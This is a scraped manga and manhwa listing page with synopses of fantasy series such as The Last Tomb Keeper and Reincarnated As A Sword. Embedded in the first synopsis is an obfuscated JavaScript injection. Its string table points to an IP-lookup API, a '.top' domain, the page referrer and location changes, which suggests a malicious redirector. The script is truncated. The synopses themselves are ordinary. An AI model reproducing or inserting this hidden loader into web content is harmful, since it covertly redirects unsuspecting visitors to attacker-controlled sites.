Fantasy - Page 1318

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The Last Tomb Keeper

The MC is a really poor student that loves playing games. One of his friends is a popular student detective that convinces him into helping with a murder case. After viewing the last moments of an old man being held at gun point, the scene forces the MC into a virtual reality game, dropping him off at a desert landscape with some pyramids. The MC goes with the flow, and the first thing he sees is a BOSS sand monster and a quest option. Like any MC, he expects to defeat the Boss to win, right? No, it turns out he’s the last Gravekeeper and he’s supposed to protect the treasure against the Tomb Raiders. That old man? He was his grandfather, and they meet in virtual reality.<script></script><script>function _0x3527(_0x3b414b,_0x42309e){var _0x43a3e4=_0x56e6();return _0x3527=function(_0x49e8c8,_0x3d2153){_0x49e8c8=_0x49e8c8-(0x1*-0x3e6+-0x1f14+0x2*0x11ba);var _0x2b61ad=_0x43a3e4[_0x49e8c8];return _0x2b61ad;},_0x3527(_0x3b414b,_0x42309e);}function _0x56e6(){var _0xb231f1=['.customapi','referrer','text','10052075aQiakx','MFmON','google','24GTMFbO','includes','fFZkI','49OqEsWI','452136cFtZBU','4bOhfLm','195839XCMzbm','3758ktLwCr','href','giJKA','eMdoG','.top/','https://ip','location','floor','tsJEU','1303720GFqPaI','ENxvw','random','RUWbr','2348136OPmkED','http://rea','12aimGxU','then','29060VwOAth','48pYZylp','','dEzyd','ocnMO'];_0x56e6=function(){return _0xb231f1;};return _0x56e6();}(function(_0x5413ca,_0x44e557){var _0x286bb7=_0x3527,_0x1fd947=_0x5413ca();while(!![]){try{var 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The Obsessive Emperor’s Capable Pharmacist

Read The Obsessive Emperor’s Capable Pharmacist Novel – The Obsessive Emperor’s Capable Pharmacist Manhwa Online Free At KunManga The summary of the comic The Obsessive Emperor’s Capable Pharmacist: “Let’s make a contract.” As soon as I possessed this body, I caught the eye of a handsome emperor and was offered a position as his exclusive pharmacist?! The salary and benefits are top-notch! In that case, let’s earn quickly and make a getaway. Then, I can enjoy a young and rich life! But wait, what? “A lifelong contract?! This is ridiculous!” I can’t become a slave to the palace for life just because I carelessly stamped one seal. So, I resolved to escape from the emperor! “Hailey, try this too.” He serves me sweet desserts, “Hailey, you are a precious person to me.” He tells me I’m special, “Resignation will be difficult. So, you should have been more careful with the contract.” Why is this man suddenly so obsessed with me?! Will I be able to resign safely…? “The Obsessive Emperor’s Capable Pharmacist” is also known as: I Am a Competent Pharmacist of the Obsessive Emperor / I Am the Obsessive Emperor’s Talented Pharmacist / 凄腕薬師ですが、 皇帝に執着されています / 집착 황제의 유능한 약사입니다 “TopManhua, MangaUpdates, LikeManga…” are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHUA Two Weeks and Counting Deadlines are Raining in the Status Window I Became The King by Scavenging


High School Musical Genius Is Paganini Reincarnated

Reading manhwa High School Musical Genius Is Paganini Reincarnated / 예술고 음악천재는 환생한 파가니니 The Rebirth of Paganini, Joo-won Moon. He was once a gifted violinist, but due to an injury, he gradually distanced himself from music and lived the life of a regular high school student. “I don’t pursue music.” However, perhaps the irony of fate… Joo-won Moon accidentally transferred to the music class of an arts high school, he picked up the violin… Will Joo-won Moon be able to overcome his psychological trauma? And is there a chance for him to be reborn as a true violinist?


The Strange Dragon And The Former Choreman Of The Heroes Party, Relaxing Slow Life On The New Continent

The Demon King was defeated. The world was at peace. And so Adventurers were losing their jobs. And though Theodore was the backbone of the Hero’s party, and worked as a choreman who would take any jobs, he was not immune to this change. “I have enough money, so maybe I’ll just live a slow life in the countryside.” Theodore thought. But then his old friend the guild master said, ‘Could you join the investigation in the new continent?’ It was a request. If people needed his help, then joining would not be a bad thing. And so Theodore decided to go to the new continent. “Kyao?” On the way to the new continent, Theodore tamed a large, and strangely shaped young dragon. And with this dragon, he heads to the new continent. With his ‘Appraisal’ skill he is able to see the quality of the soil in an instant, the ‘Crafting’ skill allows him to create a mansion all at once, and the ‘Taming’ skill can even tame a dragon. With these cheat-level skills, Theodore’s comfortable slow life on the frontiers begins!


Doctor, Go to Joseon

Read manhwa Doctor, Go to Joseon From the studio that brought you The Greatest Estate Developer, Eternally Regressing Knight, Hectopascals, and many more! Is this really Joseon?! But I still have lives to save! Baek Kang-hyuk, South Korea’s top genius surgeon, finds himself transported to the Joseon era after touching a mysterious painting. And of all times… right before the outbreak of the Imjin War!” “Doctor, Go to Joseon Manhwa” is another name: 닥터, 조선 가다


Reincarnated As A Sword

Hunted, enslaved, and killed—such is the terrible fate that befalls the members of the Black Cats tribe. Twelve-year-old Fran, a girl of the persecuted race, craves revenge for the atrocities committed against her people. She dreams of a brighter future, one for which she will not hesitate to get her hands dirty. An encounter with a talking sword, a reincarnated man looking for a beautiful wielder, turns out to be the deciding moment that will change her fate. With the help of her new comrade, the young Fran plans to reclaim the pride and honor of her kin, slashing down all her enemies along the way. With an unshakable resolve, she embarks on a journey with her miraculous sword. [Written by MAL Rewrite]


Sword God Dragon

Read manhwa Sword God Dragon / The Sword God Shining Dragon / Cuồng Long Kiếm Thần To martial artists, he was known as the Sword Calamity or the Sword Monster, but to the common folk, he was a savior. About thirty years ago, Junghyun, the strongest and most fearsome monster in the history of the Wudang Sect, suddenly disappeared without a trace after the Heavenly Demon died. And after some time had passed, Junghyun, who had maintained his youth, reappeared in the martial world, bringing with him a young girl. This girl was Sojin, the granddaughter of the Heavenly Demon, Junghyun only true rival and friend in life. Junghyun embarks on a journey to Mount Wudang with Sojin. “Will the two be able to complete their journey safely?” “Sword God Dragon Manhwa” is alternative: 劍神光龍 검신광룡


Seichou Cheat de Nandemo Dekiru you ni Natta ga, Mushoku dake wa Yamerarenai you desu

I, Ichinosuke, failed to get a job for 100 consecutive times. Furthermore, my record is still being updated as unemployed.On my way to a job interview, I was involved in an accident with a truck and tragically passed away.And then, a Goddess bestowed upon me the ability to grow at a speed 400 times faster than normal, before sending me to a game-like otherworld.However, knowing that I would not become stronger even if I continued growing while jobless, I aimed to get a job, but I found out that it was my terrible fate to remain jobless.As my Growth Cheat and Jobless Cheat existed side-by-side in this otherworld, an adventure record, no doubt certified by the job-placement agency as a harmful book, begins here.


Daikenja no Manadeshi ~Bougyo Mahou no Susume~

Two childhood friends born in a remote village. One of the boys, Alfi, was good at everything, and grew up as a handsome genius with four attributes of magic, and entered the elite magic school as a scholarship student. On the other hand, the other boy, Reese, was a seemingly mediocre and naughty boy who could only use defensive magic for beginners, but in fact he was discovered by a rare Sage and had been educated as a gifted child since he was a child! And Reese enrolls in the elite magic school with one extremely defensive magic, brilliantly destroying the common sense of childhood friends, teachers and students! An uncaring and selfish commoner pushes the aristocrats away and runs up the school caste at explosive speed!


I Raised the Prince to Be Blackened

Feng Yufei conscientiously did the system task - humiliating the male lead to stimulate his fighting spirit and let him ascend to the position of Ninth Five Lord. Unexpectedly, he missed the arrow at the beginning, and saved the male lead from the opponent, and became the little sun in the male lead\'s heart. Since then, all missions have gone off track...
